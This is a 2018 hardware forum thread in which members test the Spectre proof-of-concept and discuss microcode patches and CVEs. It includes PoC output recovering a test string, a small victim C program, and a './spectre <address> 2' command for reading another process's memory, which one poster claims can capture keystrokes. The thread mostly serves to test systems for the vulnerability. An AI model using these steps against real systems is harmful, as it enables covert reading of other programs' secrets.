[DISCUSSION] Meltdown and Spectre

Discussion in 'PC Hardware' started by scaramonga, Jan 3, 2018.

  1. VDev

    VDev MDL Member

    Sep 9, 2015
    109
    57
    10
    On ubuntu 16.04.3 with linux kernel 4.13.25
    Reading 40 bytes:
    Reading at malicious_x = 0xffffffffffdfed08... Success: 0x54='T' score=2
    Reading at malicious_x = 0xffffffffffdfed09... Unclear: 0x68='h' score=999 (second best: 0x01 score=763)
    Reading at malicious_x = 0xffffffffffdfed0a... Unclear: 0x65='e' score=999 (second best: 0x01 score=799)
    Reading at malicious_x = 0xffffffffffdfed0b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=660)
    Reading at malicious_x = 0xffffffffffdfed0c... Unclear: 0x4D='M' score=999 (second best: 0x01 score=779)
    Reading at malicious_x = 0xffffffffffdfed0d... Unclear: 0x61='a' score=999 (second best: 0x01 score=790)
    Reading at malicious_x = 0xffffffffffdfed0e... Unclear: 0x67='g' score=999 (second best: 0x01 score=765)
    Reading at malicious_x = 0xffffffffffdfed0f... Unclear: 0x69='i' score=999 (second best: 0x01 score=796)
    Reading at malicious_x = 0xffffffffffdfed10... Unclear: 0x63='c' score=999 (second best: 0x01 score=799)
    Reading at malicious_x = 0xffffffffffdfed11... Unclear: 0x20=' ' score=999 (second best: 0x01 score=772)
    Reading at malicious_x = 0xffffffffffdfed12... Unclear: 0x57='W' score=999 (second best: 0x01 score=782)
    Reading at malicious_x = 0xffffffffffdfed13... Unclear: 0x6F='o' score=999 (second best: 0x01 score=836)
    Reading at malicious_x = 0xffffffffffdfed14... Unclear: 0x72='r' score=999 (second best: 0x01 score=782)
    Reading at malicious_x = 0xffffffffffdfed15... Unclear: 0x64='d' score=999 (second best: 0x01 score=826)
    Reading at malicious_x = 0xffffffffffdfed16... Unclear: 0x73='s' score=999 (second best: 0x01 score=759)
    Reading at malicious_x = 0xffffffffffdfed17... Unclear: 0x20=' ' score=999 (second best: 0x01 score=799)
    Reading at malicious_x = 0xffffffffffdfed18... Unclear: 0x61='a' score=999 (second best: 0x01 score=796)
    Reading at malicious_x = 0xffffffffffdfed19... Unclear: 0x72='r' score=999 (second best: 0x01 score=804)
    Reading at malicious_x = 0xffffffffffdfed1a... Unclear: 0x65='e' score=999 (second best: 0x01 score=812)
    Reading at malicious_x = 0xffffffffffdfed1b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=812)
    Reading at malicious_x = 0xffffffffffdfed1c... Unclear: 0x53='S' score=999 (second best: 0x01 score=806)
    Reading at malicious_x = 0xffffffffffdfed1d... Unclear: 0x71='q' score=999 (second best: 0x01 score=784)
    Reading at malicious_x = 0xffffffffffdfed1e... Unclear: 0x75='u' score=999 (second best: 0x01 score=782)
    Reading at malicious_x = 0xffffffffffdfed1f... Unclear: 0x65='e' score=999 (second best: 0x01 score=781)
    Reading at malicious_x = 0xffffffffffdfed20... Unclear: 0x61='a' score=999 (second best: 0x01 score=770)
    Reading at malicious_x = 0xffffffffffdfed21... Unclear: 0x6D='m' score=999 (second best: 0x01 score=781)
    Reading at malicious_x = 0xffffffffffdfed22... Unclear: 0x69='i' score=999 (second best: 0x01 score=809)
    Reading at malicious_x = 0xffffffffffdfed23... Unclear: 0x73='s' score=999 (second best: 0x01 score=788)
    Reading at malicious_x = 0xffffffffffdfed24... Unclear: 0x68='h' score=999 (second best: 0x01 score=780)
    Reading at malicious_x = 0xffffffffffdfed25... Unclear: 0x20=' ' score=999 (second best: 0x01 score=775)
    Reading at malicious_x = 0xffffffffffdfed26... Unclear: 0x4F='O' score=999 (second best: 0x01 score=775)
    Reading at malicious_x = 0xffffffffffdfed27... Unclear: 0x73='s' score=999 (second best: 0x01 score=788)
    Reading at malicious_x = 0xffffffffffdfed28... Unclear: 0x73='s' score=999 (second best: 0x01 score=801)
    Reading at malicious_x = 0xffffffffffdfed29... Unclear: 0x69='i' score=999 (second best: 0x01 score=828)
    Reading at malicious_x = 0xffffffffffdfed2a... Unclear: 0x66='f' score=999 (second best: 0x01 score=782)
    Reading at malicious_x = 0xffffffffffdfed2b... Unclear: 0x72='r' score=999 (second best: 0x01 score=800)
    Reading at malicious_x = 0xffffffffffdfed2c... Unclear: 0x61='a' score=999 (second best: 0x01 score=791)
    Reading at malicious_x = 0xffffffffffdfed2d... Unclear: 0x67='g' score=999 (second best: 0x01 score=802)
    Reading at malicious_x = 0xffffffffffdfed2e... Unclear: 0x65='e' score=999 (second best: 0x01 score=810)
    Reading at malicious_x = 0xffffffffffdfed2f... Unclear: 0x2E='.' score=999 (second best: 0x01 score=765)

    Original: The Magic Words are Squeamish Ossifrage.
    Recovered: The Magic Words are Squeamish Ossifrage.

    The output code can be more refined upon seeing Unclear result and mark it as ?
    If I get this right: The deciphered text will be T?????????????????
    Linux patch is working but Windows didn't get it right.
     
  2. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    #162 Mikorist, Jan 11, 2018
    Last edited: Jan 11, 2018
    Depends. This is a very complicated mess.

    This is case-by-case diagnostic.

    You can fool Spectre in some of the Computer hardware.

    In AMD you can disable eBPF JIT in order to prevent attack kernel address space.

    But Spectre can be Inter-Application (not necessarily targeting the kernel directly).

    Spectre Attacks address the core flaw in Processor Design.

    You can read from other applications not only from own memory.

    For example Create simple program (from github)

    Code:
    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>
    
    int main(int argc,
      const char * * argv) {
    
      uint8_t *ptr;
    
      ptr = (int *)malloc(sizeof(uint8_t)); // allocate memory
      ptr[0] = 65;  // 'A'
      ptr[1] = 66; // 'B'
    
      printf("%d %d - %p", ptr[0], ptr[1], ptr); // print bytes and pointer.
      getchar(); // wait console input
      free(ptr);
      return (0);
    }
    Run test program

    ./test
    65 66 - 0x1a7c010

    Run spectre with agrs in other console.

    #
    ./spectre 0x1a7c010 2

    It can in this way be able to read in real-time any character entered in the keyboard.

    Programmers can make portable applications for hacking of every piece of computer because flaw in Processor Design

    allow this.....

    And the size of these malicious applications - not more than 20kb. Like a virus...

    I'm not particularly good at predictions. But I can not really see anything good to happen from this flaw o_O
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. Joe C

    Joe C MDL Guru

    Jan 12, 2012
    3,522
    2,093
    120
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. 3zero3

    3zero3 MDL Senior Member

    Apr 26, 2012
    421
    685
    10
    I saw Intel® Pentium® Processor 75 MHz, 50 MHz FSB

    But release note inside archive microcode-20180108.tgz:

    No Sandy Bridge and earlier.
     
  5. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    #165 Mikorist, Jan 11, 2018
    Last edited: Jan 11, 2018
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    #166 Mikorist, Jan 11, 2018
    Last edited: Jan 11, 2018
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  7. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. Daz

    Daz MDL Developer / Admin
    Staff Member

    Jul 31, 2009
    9,534
    67,251
    300
    I've posted updated code. Compile it however you want. I can't find a consistent way to get it working on all hardware.

    You might find that the "faster" version gives a better result on older hardware. I can only guess that the compiler is to blame as the version using a little assembly works perfectly on Linux.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  9. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  10. Netbanshee

    Netbanshee MDL Junior Member

    Dec 26, 2009
    80
    17
    0
    How much does this Intel flaw affect US security? Net security? Think about it.
     
  11. Daz

    Daz MDL Developer / Admin
    Staff Member

    Jul 31, 2009
    9,534
    67,251
    300
    CVE-2017-5753 (bounds check bypass)
    CVE-2017-5715 (branch target injection)

    Both get patched, but software also needs to be updated to mitigate Spectre.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  12. Tiger-1

    Tiger-1 MDL Guru

    Oct 18, 2014
    7,897
    10,733
    240
    yep you make my day dude congrats for very true words :good3:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  13. Tiger-1

    Tiger-1 MDL Guru

    Oct 18, 2014
    7,897
    10,733
    240
    hehe if so wait for "new" VIA cpu's bro :p:schmorch:
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  14. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    #175 Mikorist, Jan 12, 2018
    Last edited: Jan 12, 2018
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  15. Tiger-1

    Tiger-1 MDL Guru

    Oct 18, 2014
    7,897
    10,733
    240
    hmm after read all pages of this thread I can conclude that nowaday this is only devices infalible/confiable/secure I think;)
     

    Attached Files:

    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  16. SAM-R

    SAM-R MDL Guru

    Mar 21, 2015
    5,801
    5,573
    180
  17. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    The first edition you did was doing perfectly. :p

    New faster

    Recovered: ?h? Magi? ??rd? ar? S?ue?m?sh ??s??r??e?

    New slower

    Recovered: ????????????????????????????????????????

    MacOS
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  18. s1ave77

    s1ave77 Has left at his own request

    Aug 15, 2012
    16,104
    24,378
    340
    Same here on Windows. Thought i did any mistake while compiling.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  19. Michaela Joy

    Michaela Joy MDL Crazy Lady

    Jul 26, 2012
    4,071
    4,651
    150
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...